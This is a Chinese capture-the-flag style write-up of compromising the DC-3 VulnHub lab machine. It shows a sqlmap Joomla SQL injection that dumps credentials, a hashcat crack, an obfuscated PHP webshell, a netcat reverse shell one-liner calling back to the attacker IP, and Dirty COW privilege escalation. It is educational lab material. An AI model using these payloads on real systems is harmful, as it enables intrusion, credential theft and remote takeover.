
【writeup】DC:3.2靶机
发布日期:2021-05-09 17:13:25
浏览次数:13
分类:精选文章
本文共 3161 字,大约阅读时间需要 10 分钟。
【writeup】DC:3.2靶机
前言
靶机环境:
kali攻击机IP:192.168.128.128 靶机IP:192.168.128.133过程
端口扫描
nmap扫描靶机,靶机IP:192.168.128.133,仅开放了80端口http服务。扫描到靶机用了joomla,是个cms系统。
$ sudo nmap -sS -sV -sC -p80 192.168.128.133...PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-generator: Joomla! - Open Source Content Management|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: HomeMAC Address: 00:0C:29:8B:7C:8A (VMware)
目录扫描
同步扫描了下网站目录,有一些文件可以获得有用信息。
README.txt中有一个joomla的版本信息,3.7版本。搜索了下,存在一些漏洞,尝试SQL注入漏洞,成功获取用户名密码。 /administrator/index.php,成功登录后台管理页面。[10:16:13] 200 - 4KB - /README.txt# Joomla! 3.7 version histor[10:16:16] 200 - 5KB - /administrator/index.php# 登录界面
登录后台后看到joomla貌似是3.2版本
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RU5xZWUx-1616854038278)(en-resource://database/2586:1)]joomlaSQL注入过程
joomla存在SQL注入漏洞
https://www.exploit-db.com/exploits/44227
sqlmap -u "http://192.168.128.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1" -p "list[fullordering]" --dbs -D joomladb -T "#__users" -C "id,email,name,params,password,username" --dump...[00:59:16] [INFO] fetching entries of column(s) 'email,id,name,params,password,username' for table '#__users' in database 'joomladb'[00:59:16] [INFO] retrieved: 'freddy@norealaddress.net'[00:59:16] [INFO] retrieved: '629'[00:59:16] [INFO] retrieved: 'admin'[00:59:16] [INFO] retrieved: '{"admin_style":"","admin_language":"","language":"","editor":"","helpsite":"","timezone":""}'[00:59:16] [INFO] retrieved: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'[00:59:17] [INFO] retrieved: 'admin'...
用hashcat破解出密码明文:snoopy
$ hashcat -m 3200 -a 0 vulnhub/dc3-pass.txt /usr/share/wordlists/rockyou.txt$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu:snoopy
get shell
在管理后台的模板功能,可以编辑加webshell进去。
webshell如下:$pass = "9cdfb439c7876e703e307864c9167a15"; //lol $A = chr(0x73);$B = chr(0x79);$X = chr(0x74);$D = chr(0x65);$E = chr(0x6d);$hook = $A.$B.$A.$X.$D.$E;if($pass == md5($_POST['password'])){ $hook(base64_decode($_POST['cmd']));}else{ die();}
回连shell如下:
$ msfvenom -p cmd/unix/reverse_netcat lhost=192.168.128.128 lport=8888 R...mkfifo /tmp/uixco; nc 192.168.128.128 8888 0/tmp/uixco 2>&1; rm /tmp/uixco
攻击机开启监听,成功连接。
$ nc -nlvp 8888listening on [any] 8888 ...connect to [192.168.128.128] from (UNKNOWN) [192.168.128.133] 34870iduid=33(www-data) gid=33(www-data) groups=33(www-data)
使用linux-exploit-suggester,尝试了第一个 [CVE-2016-5195] dirtycow 2,成功提权。
https://www.exploit-db.com/exploits/40847
获取flag
root@DC-3:~# cat the-flag.txtcat the-flag.txt __ __ _ _ ____ _ _ _ _ \ \ / /__| | | | _ \ ___ _ __ ___| | | | | \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | | \ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_| \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_) Congratulations are in order. :-)I hope you've enjoyed this challenge as I enjoyed making it.If there are any ways that I can improve these little challenges,please let me know.As per usual, comments and complaints can be sent via Twitter to @DCAU7Have a great day!!!!
发表评论
最新留言
第一次来,支持一个
[***.219.124.196]2025年04月13日 16时24分59秒
关于作者

喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
【DockerCE】CentOS 7.9安装DockerCE 20.10.6
2021-05-10
Java 中的多态详解
2021-05-10
交换二叉树中每个结点的左孩子和右孩子~2020.8.13~学习笔记
2021-05-10
git系列--详解
2021-05-10
Java常用包系列--JWT
2021-05-10
Linux命令--文件命令
2021-05-10
并发相关问题
2021-05-10
Linux应用编程示例
2021-05-10
Java 以逗号分割的字符串数据取出来,逗号前面的字符
2021-05-10
IDEA导入Maven工程,导入Spring Boot框架工程
2021-05-10
flutter 基于Timer实现的倒计时以及周期性任务
2021-05-10
Java时间类Date全解析
2021-05-10
安卓项目实战之:APP版本更新适配 Android 8.0
2021-05-10
安卓项目实战之:字体设置相关以及库Calligraphy的使用
2021-05-10
XEditText文本输入框的使用
2021-05-10
使用 MultiDex 解决 64K 限制
2021-05-10
Glide4实现网络图片加载进度监听
2021-05-10
c++获取系统代理信息
2021-05-10